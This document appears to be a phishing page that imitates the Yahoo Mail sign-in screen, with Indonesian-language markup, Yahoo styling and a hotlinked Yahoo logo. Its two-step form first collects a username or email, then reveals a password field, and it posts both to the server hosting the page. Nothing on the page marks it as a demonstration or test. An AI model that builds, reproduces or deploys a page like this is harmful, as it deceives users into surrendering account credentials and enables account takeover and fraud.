<!DOCTYPE html>
<html lang="id">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Sign In Yahoo Mail</title>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        body {
            font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif;
            background: linear-gradient(135deg, #6001d2 0%, #00c9ff 100%);
            display: flex;
            justify-content: center;
            align-items: center;
            min-height: 100vh;
            padding: 20px;
        }

        .container {
            background-color: #ffffff;
            border-radius: 8px;
            padding: 40px;
            max-width: 430px;
            width: 100%;
            box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
        }

        .logo {
            text-align: center;
            margin-bottom: 30px;
        }

        .logo svg {
            width: 90px;
            height: auto;
        }

        h1 {
            font-size: 28px;
            font-weight: 600;
            color: #000;
            margin-bottom: 8px;
            text-align: center;
        }

        .subtitle {
            font-size: 15px;
            color: #5f5f5f;
            margin-bottom: 30px;
            text-align: center;
        }

        .form-group {
            margin-bottom: 16px;
        }

        label {
            display: block;
            font-size: 13px;
            color: #000;
            margin-bottom: 8px;
            font-weight: 400;
        }

        input[type="text"],
        input[type="email"],
        input[type="password"] {
            width: 100%;
            padding: 14px;
            font-size: 15px;
            border: 1px solid #d6d6d6;
            border-radius: 6px;
            outline: none;
            transition: all 0.2s;
        }

        input[type="text"]:focus,
        input[type="email"]:focus,
        input[type="password"]:focus {
            border-color: #6001d2;
        }

        .checkbox-container {
            display: flex;
            align-items: center;
            margin: 20px 0;
        }

        .checkbox-container input[type="checkbox"] {
            width: 18px;
            height: 18px;
            margin-right: 8px;
            cursor: pointer;
        }

        .checkbox-container label {
            font-size: 14px;
            color: #000;
            margin: 0;
            cursor: pointer;
        }

        .submit-btn {
            width: 100%;
            background-color: #6001d2;
            color: #ffffff;
            border: none;
            padding: 14px;
            font-size: 16px;
            font-weight: 600;
            border-radius: 24px;
            cursor: pointer;
            transition: background-color 0.2s;
            margin-top: 10px;
        }

        .submit-btn:hover {
            background-color: #5001b2;
        }

        .forgot-link {
            display: block;
            text-align: center;
            font-size: 14px;
            color: #6001d2;
            text-decoration: none;
            margin-top: 16px;
        }

        .forgot-link:hover {
            text-decoration: underline;
        }

        .create-account {
            width: 100%;
            background-color: transparent;
            color: #6001d2;
            border: 2px solid #6001d2;
            padding: 14px;
            font-size: 16px;
            font-weight: 600;
            border-radius: 24px;
            cursor: pointer;
            transition: all 0.2s;
            margin-top: 16px;
        }

        .create-account:hover {
            background-color: #f5f5f5;
        }

        .divider {
            text-align: center;
            margin: 24px 0;
            color: #5f5f5f;
            font-size: 14px;
        }

        .google-btn {
            width: 100%;
            background-color: #ffffff;
            color: #5f5f5f;
            border: 1px solid #d6d6d6;
            padding: 14px;
            font-size: 15px;
            font-weight: 500;
            border-radius: 24px;
            cursor: pointer;
            display: flex;
            align-items: center;
            justify-content: center;
            gap: 10px;
            transition: all 0.2s;
        }

        .google-btn:hover {
            background-color: #f5f5f5;
            border-color: #b0b0b0;
        }

        .user-info {
            background-color: #f8f9fa;
            border: 1px solid #e0e0e0;
            border-radius: 6px;
            padding: 12px;
            margin-bottom: 20px;
            font-size: 13px;
            color: #5f5f5f;
        }

        .user-info strong {
            color: #000;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="logo">
            <img src="https://s.yimg.com/rz/p/yahoo_frontpage_en-US_s_f_p_bestfit_frontpage_2x.png" alt="Yahoo" class="logo yahoo-id-ID" width="" height="27">
        </div>
        
        <h1>Sign In Yahoo Mail</h1>
        
        <form id="emailForm">
            <div class="form-group">
                <label for="email">Username, email, atau phone number</label>
                <input type="text" id="email" name="email" required autofocus>
            </div>

            <div class="checkbox-container">
                <input type="checkbox" id="staySignedIn">
                <label for="staySignedIn">Remember Sign In</label>
            </div>

            <button type="submit" class="submit-btn">Next</button>

            <a href="#" class="forgot-link">Forgot Password?</a>

            <button type="button" class="create-account">Create Account</button>
        </form>

        <!-- Step 2: Password -->
        <form id="passwordForm" action="" method="POST" style="display: none;">
            <div class="form-group">
                <div style="margin-bottom: 16px; padding: 12px; background-color: #f8f9fa; border-radius: 6px; border: 1px solid #e0e0e0; font-size: 13px; color: #5f5f5f;">
                    <strong id="emailDisplay" style="color: #000;"></strong>
                    
                </div>
            </div>

            <div class="form-group">
                <label for="password">Password</label>
                <input type="password" id="password" name="password" required autofocus>
            </div>

            <input type="hidden" id="emailHidden" name="email">

            <div class="checkbox-container">
                <input type="checkbox" id="staySignedIn2">
                <label for="staySignedIn2">Remember Sign In</label>
            </div>

            <button type="submit" class="submit-btn">Next</button>

            <a href="#" class="forgot-link">Forgot Password?</a>

            <button type="button" class="create-account">Create Account</button>
        </form>
    </div>

    <script>
        // Two-step login
        document.getElementById('emailForm').addEventListener('submit', function(e) {
            e.preventDefault();
            const email = document.getElementById('email').value.trim();
            
            if (!email) {
                alert('Email/Username required');
                return;
            }
            
            // Show password step
            document.getElementById('emailForm').style.display = 'none';
            document.getElementById('passwordForm').style.display = 'block';
            document.getElementById('emailDisplay').textContent = email;
            document.getElementById('emailHidden').value = email;
            document.getElementById('password').focus();
        });

        function goBackToEmail(e) {
            if (e) e.preventDefault();
            document.getElementById('emailForm').style.display = 'block';
            document.getElementById('passwordForm').style.display = 'none';
            document.getElementById('email').focus();
        }
    </script>
</body>
</html>